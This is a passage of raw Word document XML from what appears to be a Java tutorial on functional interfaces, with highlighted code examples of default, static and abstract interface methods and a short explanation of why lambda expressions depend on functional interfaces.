        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4827C505" w14:textId="77777777" w:rsidR="00C023F6" w:rsidRPr="00C023F6" w:rsidRDefault="00C023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8730911"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C023F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38BE3944" w14:textId="77777777" w:rsidR="00C023F6" w:rsidRPr="00C023F6" w:rsidRDefault="00C023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8730911"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C023F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00C023F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>// Calling default and static methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A7C77B" w14:textId="77777777" w:rsidR="00C023F6" w:rsidRPr="00C023F6" w:rsidRDefault="00C023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8730911"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C023F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        myFunction</w:t>
      </w:r>
      <w:r w:rsidRPr="00C023F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00C023F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>defaultMethod</w:t>
      </w:r>
      <w:r w:rsidRPr="00C023F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="639CBB75" w14:textId="77777777" w:rsidR="00C023F6" w:rsidRPr="00C023F6" w:rsidRDefault="00C023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8730911"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C023F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00C023F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>MyFunctionalInterface</w:t>
      </w:r>
      <w:r w:rsidRPr="00C023F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00C023F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>staticMethod</w:t>
      </w:r>
      <w:r w:rsidRPr="00C023F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED0686D" w14:textId="77777777" w:rsidR="00C023F6" w:rsidRPr="00C023F6" w:rsidRDefault="00C023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8730911"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C023F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00C023F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D1C94A" w14:textId="6D2AAB87" w:rsidR="00C023F6" w:rsidRPr="00C023F6" w:rsidRDefault="00C023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8730911"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C023F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r w:rsidRPr="00C023F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12EC7651" w14:textId="77777777" w:rsidR="001A1145" w:rsidRPr="00CE4B95" w:rsidRDefault="001A1145" w:rsidP="009D5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p w14:paraId="1483CCA8" w14:textId="77777777" w:rsidR="001A1145" w:rsidRPr="00CE4B95" w:rsidRDefault="001A1145"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oing something!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F4F0A99" w14:textId="77777777" w:rsidR="001A1145" w:rsidRPr="00CE4B95" w:rsidRDefault="001A1145"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is a default method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36564096" w14:textId="77777777" w:rsidR="001A1145" w:rsidRPr="00CE4B95" w:rsidRDefault="001A1145"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is a static method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F88C64" w14:textId="77777777" w:rsidR="001A1145" w:rsidRPr="00CE4B95" w:rsidRDefault="001A1145" w:rsidP="009D5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Benefits of Functional Interfaces:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B2EA042" w14:textId="77777777" w:rsidR="001A1145" w:rsidRPr="00CE4B95" w:rsidRDefault="001A1145" w:rsidP="009D53A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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implified Code</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: You can pass behavior around as data (lambda expressions), simplifying code and improving readability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C6EC33" w14:textId="77777777" w:rsidR="001A1145" w:rsidRPr="00CE4B95" w:rsidRDefault="001A1145" w:rsidP="009D53A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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mproved Performance</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Lambdas and functional interfaces can help with performance optimizations, such as reducing boilerplate code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="286053C5" w14:textId="77777777" w:rsidR="001A1145" w:rsidRPr="00CE4B95" w:rsidRDefault="001A1145" w:rsidP="009D53A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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upport for Functional Programming</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Enables functional programming patterns in Java, making it easier to work with data in an immutable and declarative manner.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="127A6DFB" w14:textId="77777777" w:rsidR="001A1145" w:rsidRPr="00CE4B95" w:rsidRDefault="001A1145" w:rsidP="009D5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mportant Note:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD9FF9C" w14:textId="77777777" w:rsidR="001A1145" w:rsidRPr="00CE4B95" w:rsidRDefault="001A1145"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though you don’t have to use the @FunctionalInterface annotation, it’s good practice to use it because it marks the interface as functional, and the compiler will check if it violates the rules (such as having more than one abstract method).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F30042D" w14:textId="77777777" w:rsidR="001A1145" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="001A114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72DD4D6">
          <v:rect id="_x0000_i1679" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB301F9" w14:textId="58CC0411" w:rsidR="00446460" w:rsidRPr="00CE4B95" w:rsidRDefault="00446460">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="215" w:name="_Toc196307695"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Why we need Functional Interface?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="215"/>
    </w:p>
    <w:p w14:paraId="34EFC293" w14:textId="1A243D07" w:rsidR="00936CAC" w:rsidRPr="00CE4B95" w:rsidRDefault="00936CAC" w:rsidP="009D53A3">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Functional Interfaces are essential in Java, especially after the introduction of </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Lambda Expressions</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Java 8. They provide several benefits that simplify code, enhance readability, and support functional programming paradigms. Here’s why </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Functional Interfaces</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are important:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D0859D1" w14:textId="77777777" w:rsidR="00936CAC" w:rsidRPr="00CE4B95" w:rsidRDefault="00936CAC" w:rsidP="009D5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Enabling Lambda Expressions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="746A8DA6" w14:textId="77777777" w:rsidR="00936CAC" w:rsidRPr="00CE4B95" w:rsidRDefault="00936CAC" w:rsidP="009D53A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="95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ambda Expressions</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are one of the main features introduced in Java 8, and they are used to provide clear and concise syntax for writing code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C91AB5" w14:textId="77777777" w:rsidR="00936CAC" w:rsidRPr="00CE4B95" w:rsidRDefault="00936CAC" w:rsidP="009D53A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="95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Functional Interface</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is required for lambda expressions because lambdas are implemented as instances of these interfaces.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C125FE7" w14:textId="77777777" w:rsidR="00936CAC" w:rsidRPr="00CE4B95" w:rsidRDefault="00936CAC" w:rsidP="009D53A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="95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ithout functional interfaces, Java wouldn't be able to use lambdas effectively.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47F60C11" w14:textId="77777777" w:rsidR="00936CAC" w:rsidRPr="00CE4B95" w:rsidRDefault="00936CAC" w:rsidP="009D5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2B8CDEC2" w14:textId="77777777" w:rsidR="00F40224" w:rsidRPr="00F40224" w:rsidRDefault="00F402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795427"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F40224">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@FunctionalInterface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="564A72D8" w14:textId="77777777" w:rsidR="00F40224" w:rsidRPr="00F40224" w:rsidRDefault="00F402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795427"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F40224">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="00F40224">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F40224">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>interface</w:t>
      </w:r>
      <w:r w:rsidRPr="00F40224">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F40224">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Operation</w:t>
      </w:r>
      <w:r w:rsidRPr="00F40224">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F40224">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0124B56B" w14:textId="77777777" w:rsidR="00F40224" w:rsidRPr="00F40224" w:rsidRDefault="00F402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795427"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F40224">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00F40224">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r w:rsidRPr="00F40224">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> apply</w:t>
      </w:r>
      <w:r w:rsidRPr="00F40224">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00F40224">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r w:rsidRPr="00F40224">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> a</w:t>
      </w:r>
      <w:r w:rsidRPr="00F40224">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00F40224">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F40224">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r w:rsidRPr="00F40224">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> b</w:t>
      </w:r>
      <w:r w:rsidRPr="00F40224">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78508164" w14:textId="77777777" w:rsidR="00F40224" w:rsidRPr="00F40224" w:rsidRDefault="00F402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795427"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F40224">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4380CA06" w14:textId="77777777" w:rsidR="00F40224" w:rsidRPr="00F40224" w:rsidRDefault="00F402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795427"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F40224">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED30E63" w14:textId="77777777" w:rsidR="00F40224" w:rsidRPr="00F40224" w:rsidRDefault="00F402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795427"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F40224">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="00F40224">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F40224">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r w:rsidRPr="00F40224">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F40224">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>LambdaExample</w:t>
      </w:r>
      <w:r w:rsidRPr="00F40224">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F40224">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41DBCD5F" w14:textId="77777777" w:rsidR="00F40224" w:rsidRPr="00F40224" w:rsidRDefault="00F402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795427"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F40224">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00F40224">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="00F40224">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F40224">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>static</w:t>
      </w:r>
      <w:r w:rsidRPr="00F40224">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F40224">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>void</w:t>
      </w:r>
      <w:r w:rsidRPr="00F40224">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> main</w:t>
      </w:r>
      <w:r w:rsidRPr="00F40224">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
